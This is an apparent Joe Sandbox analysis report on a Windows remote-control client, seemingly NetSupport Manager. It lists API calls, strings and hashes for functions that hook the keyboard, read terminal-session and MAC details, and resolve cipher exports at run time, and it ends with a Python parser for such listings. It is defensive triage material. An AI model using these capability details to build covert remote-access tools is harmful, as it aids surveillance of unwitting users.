                                                                                        • GetLastError.KERNEL32 ref: 110A9D9D
                                                                                        • _malloc.LIBCMT ref: 110A9DB3
                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9DD5
                                                                                        • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9E07
                                                                                        • SetLastError.KERNEL32(00000078), ref: 110A9E1B
                                                                                        • GetLastError.KERNEL32 ref: 110A9E21
                                                                                        • _free.LIBCMT ref: 110A9E33
                                                                                        • SetLastError.KERNEL32(00000078), ref: 110A9E44
                                                                                        • SetLastError.KERNEL32(00000078), ref: 110A9E51
                                                                                        • _free.LIBCMT ref: 110A9E64
                                                                                        • FreeLibrary.KERNEL32(?,?), ref: 110A9E74
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9F18
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                        • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                        • API String ID: 3464732724-3340099623
                                                                                        • Opcode ID: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                        • Instruction ID: 033bff87456eb4c9bd2d5bbaba34d7345019b106b940800e90953e4c12ebf53e
                                                                                        • Opcode Fuzzy Hash: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                        • Instruction Fuzzy Hash: F2816279E14259ABEB04DFF4EC84F9FFBB8AF48704F104528F921A6284EB759905CB50

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph (rendered graph image; node/edge listing condensed): function at 11133920-11133c9f; graph nodes reference GetLocalTime, LoadLibraryA, GetCurrentProcess, GetProcAddress, GetProcessHandleCount, K32GetProcessMemoryInfo, SetLastError, FreeLibrary
                                                                                        APIs
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,1B492F88), ref: 1113398E
                                                                                        • LoadLibraryA.KERNEL32(psapi.dll), ref: 111339E6
                                                                                        • GetCurrentProcess.KERNEL32 ref: 11133A27
                                                                                        • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11133A51
                                                                                        • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11133A62
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11133A68
                                                                                        • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133A84
                                                                                        • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133AAC
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11133AC9
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11133AD6
                                                                                        • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 11133AE8
                                                                                        • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11133AFB
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11133B01
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11133C6B
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11133C78
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11133C82
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                        • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                        • API String ID: 263027137-1001504656
                                                                                        • Opcode ID: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                        • Instruction ID: 17d7fdf42b282dadbb05295794651177f64ab9c07d211a437ec733fd2e53fcc2
                                                                                        • Opcode Fuzzy Hash: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                        • Instruction Fuzzy Hash: A3B1BFB1E242699FDB10DFE9CDC0AADFBB6EB48319F10452AE414E7348DB349844CB65

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph (rendered graph image; node/edge listing condensed): function at 1102dbc0-1102e438 (entry node 1102dbc9); graph nodes reference GetComputerNameA, LoadLibraryA, GetProcAddress, SetLastError, FreeLibrary, GetCurrentProcessId, wsprintfA, CharUpperA
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102DF31
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID: $016477$14/03/16 10:38:31 V12.10F8$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                        • API String ID: 1029625771-1026522426
                                                                                        • Opcode ID: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                        • Instruction ID: 8eab5b2d156e186679f92ce27f1e5cdd209b728942572a9b5b46018c3091c824
                                                                                        • Opcode Fuzzy Hash: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                        • Instruction Fuzzy Hash: 97C1D275E0026AAFDF22DF959C84BEDF7B9AB44308F9440EDE55867280D770AE80CB51

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph (rendered graph image; node/edge listing condensed): function at 111414a0-1114188a; graph nodes reference LoadLibraryA, FreeLibrary, GetClassInfoExA, LoadCursorA, GetStockObject, RegisterClassExA, GetProcAddress, SetTimer, COMCTL32 ordinal #17
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(User32.dll,00000000,00000000), ref: 111414F3
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 11141563
                                                                                        • LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 11141586
                                                                                        • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 111415E5
                                                                                        • _memset.LIBCMT ref: 111415F9
                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 11141649
                                                                                        • GetStockObject.GDI32(00000000), ref: 11141653
                                                                                        • RegisterClassExA.USER32(?), ref: 1114166A
                                                                                        • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11141702
                                                                                        • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11141717
                                                                                        • SetTimer.USER32(00000000,00000000,000003E8,1113CD60), ref: 1114183A
                                                                                        • #17.COMCTL32(?,?,?,00000000,00000000), ref: 11141868
                                                                                        • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11141873
                                                                                          • Part of subcall function 11017450: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,1B492F88,1102FCB2,00000000), ref: 1101747E
                                                                                          • Part of subcall function 11017450: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
                                                                                          • Part of subcall function 11017450: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
                                                                                          • Part of subcall function 11017450: FreeLibrary.KERNEL32(00000000), ref: 110174F8
                                                                                          • Part of subcall function 110CC7F0: CreateWindowExA.USER32(00000000,button,11194244,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CC829
                                                                                          • Part of subcall function 110CC7F0: SetClassLongA.USER32(00000000,000000E8,110CC570), ref: 110CC840
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                         • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                        • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                        • API String ID: 3706574701-3145203681
                                                                                        • Opcode ID: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                        • Instruction ID: 9b294397b9efa9119a6c3372e39ca87a41eafe2d9b680e3b49ce131b24699399
                                                                                        • Opcode Fuzzy Hash: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                        • Instruction Fuzzy Hash: 6EA19DB4E0126AAFDB01DFE9C9C4AADFBB4FB4870DB60413EE52997644EB306440CB55

                                                                                         Control-flow Graph (graph legend: Executed / Not Executed; rendered graph not preserved in text)
                                                                                         • Function 110285F0, basic blocks 110285F0-11028D1E. API call shown in the graph: GetModuleFileNameA. Internal subcalls: 111631F0, 11163FED, 11161D01, 11026890, 11163DB7, 11162DE7, 11026700, 11026980, 11164150, followed by a long sequential chain of 111646CE calls (the wrapper around __stricmp_l listed under APIs), each of which branches back to the common block at 11028BAE.
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,73401370,?,0000001A), ref: 110286DD
                                                                                        • _strrchr.LIBCMT ref: 110286EC
                                                                                          • Part of subcall function 111646CE: __stricmp_l.LIBCMT ref: 1116470B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                         • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileModuleName__stricmp_l_strrchr
                                                                                        • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                        • API String ID: 1609618855-357498123
                                                                                        • Opcode ID: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                        • Instruction ID: efd952e0d0f75bab71a6f775fe147756553f35749af42d5d105ea8c6321280ff
                                                                                        • Opcode Fuzzy Hash: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                        • Instruction Fuzzy Hash: ED12D67CD0929A8BDB17CF64CC807E5B7F5AB19308F8400EEE9D557201EB729686CB52

                                                                                         Control-flow Graph (graph legend: Executed / Not Executed; rendered graph not preserved in text)
                                                                                         • Function 11086700, basic blocks 11086700-110868C3. API calls shown in the graph: LoadLibraryA (two call sites, 1108678C and 110867EC), GetModuleFileNameA, and nine consecutive GetProcAddress calls from 110867F9 to 1108688B. Every GetProcAddress block has an edge to the common exit block at 1108689C, consistent with a null check on each resolved pointer; only the last one continues to 110868AE. Internal subcalls: 110866F0, 11161D01, 11144BD0, 11081B40.
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108678C
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110867AA
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 110867EC
                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086807
                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108681C
                                                                                        • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108682D
                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108683E
                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108684F
                                                                                        • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086860
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                         • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                        • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                        • API String ID: 2201880244-3035937465
                                                                                        • Opcode ID: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                        • Instruction ID: c81deb3771c39ade44f8803fbe1e6421c41fb3d40bd553f41274565aeadcb2b4
                                                                                        • Opcode Fuzzy Hash: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                        • Instruction Fuzzy Hash: CD51C174E1834A9BD710DF79DC94BA6FBE9AF54304B1289AED885C7240EAB2E444CF50
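Added example for triaging listings like the ones above (this is not code from the Joe Sandbox report, from Joe Security, or from the analysed sample): a parser for the "APIs" bullet lines of these function blocks that collects the DLL names passed to LoadLibraryA and the export names passed to GetProcAddress, so runtime-resolved imports such as pcihooks!HookKeyboard and the CipherServer_* functions resolved from CryptPak.dll can be enumerated across a whole report instead of read block by block. The only assumption is that lines have exactly the shape printed on this page (`Api.MODULE(args), ref: addr`, the CRT form `Api.LIBCMT ref: addr`, optionally prefixed by `Part of subcall function XXXX:`); the sample input is copied from this page's listings.

```python
"""Parse the "APIs" bullet lines of a Joe Sandbox function block and summarise
which libraries and exports the code resolves at run time.

Added example for this page; not code from Joe Sandbox or from the sample.
Assumed input format (exactly as printed in the report):
    <Api>.<MODULE>(<arg>,<arg>,...), ref: <hex address>
    <Api>.<MODULE> ref: <hex address>           (CRT calls listed without args)
optionally prefixed by "Part of subcall function <hex>: ".
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

_SUBCALL_RE = re.compile(r"Part of subcall function\s+([0-9A-Fa-f]+):\s*")
_CALL_RE = re.compile(
    r"(?P<api>[A-Za-z_#][\w#]*)\.(?P<module>[A-Za-z0-9_]+)"   # e.g. GetProcAddress.KERNEL32 or #17.COMCTL32
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                           # address of the call site
    subcall_of: Optional[int] = None   # set for "Part of subcall function X" lines


def _is_placeholder(arg: str) -> bool:
    """'?' means the sandbox could not recover the value; an all-zero module
    handle means GetProcAddress got an HMODULE from a register, not a literal."""
    return arg == "?" or re.fullmatch(r"0+", arg) is not None


def parse_api_lines(text: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        subcall = None
        m = _SUBCALL_RE.match(line)
        if m:
            subcall = int(m.group(1), 16)
            line = line[m.end():]
        m = _CALL_RE.search(line)
        if not m:
            continue                   # not a call line (e.g. a section label)
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args is not None else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), subcall))
    return calls


def summarize(calls: List[ApiCall]) -> Dict[str, object]:
    """DLL names passed to LoadLibrary*, export names passed to GetProcAddress,
    and the number of LoadLibrary calls whose DLL name was not recoverable.
    The two lists are deliberately not paired: the listing shows only the
    module handle given to GetProcAddress, not which LoadLibrary produced it."""
    libraries: List[str] = []
    exports: List[str] = []
    unresolved = 0
    for c in calls:
        if c.api.startswith("LoadLibrary"):
            name = c.args[0] if c.args else "?"
            if _is_placeholder(name):
                unresolved += 1
            else:
                libraries.append(name)
        elif c.api == "GetProcAddress" and len(c.args) >= 2 and not _is_placeholder(c.args[1]):
            exports.append(c.args[1])
    return {"libraries": libraries, "exports": exports,
            "unresolved_library_loads": unresolved}


# Lines copied from the function blocks on this page (not constructed).
SAMPLE = """\
• LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11141702
• GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11141717
• LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11141873
  • Part of subcall function 11017450: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
  • Part of subcall function 11017450: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,73401370,?,0000001A), ref: 110286DD
• _strrchr.LIBCMT ref: 110286EC
• LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108678C
• GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086807
• GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108682D
• RegCloseKey.ADVAPI32(00000000), ref: 1114194A
"""

if __name__ == "__main__":
    for key, value in summarize(parse_api_lines(SAMPLE)).items():
        print(f"{key}: {value}")
```

On the sample above this yields three named libraries (pcihooks, riched32.dll, Kernel32.dll), one LoadLibraryA whose DLL name the sandbox printed as `?` (the call at 1108678C), and four export names. Tying the CipherServer_* exports to CryptPak.dll is done from the block's String ID line, not from the API listing, which is why the parser reports the two lists separately.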

                                                                                         Control-flow Graph (graph legend: Executed / Not Executed; rendered graph not preserved in text)
                                                                                         • Function 11141890, basic blocks 11141890-1114220D. API calls shown in the graph: RegCloseKey (at 11141949), EnterCriticalSection (at 11141FB3) and LeaveCriticalSection (at 11141FFA). Numerous internal subcalls, among them 1110F420, 11060F70, 11061700, 11142E50, 11144DC0, 11143230, 11062D60, 11060BE0, 11060760, 110607F0, 11081BB0, 11081C60, 11146450, 1105DE00, 111319F0, 110D1550, 1105DD10, 11060F40, 1106B5C0, 110679C0, 110508E0, 1102A9F0, 11133400, 110CFF20, 110D12E0, 11029450, 11009450, 11081A70, 110D07C0, 1106B620, 1113CC30, 111414A0, 11026BA0, 11060640, 111618C1 and 11161D01.
                                                                                        APIs
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 1114194A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                         • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
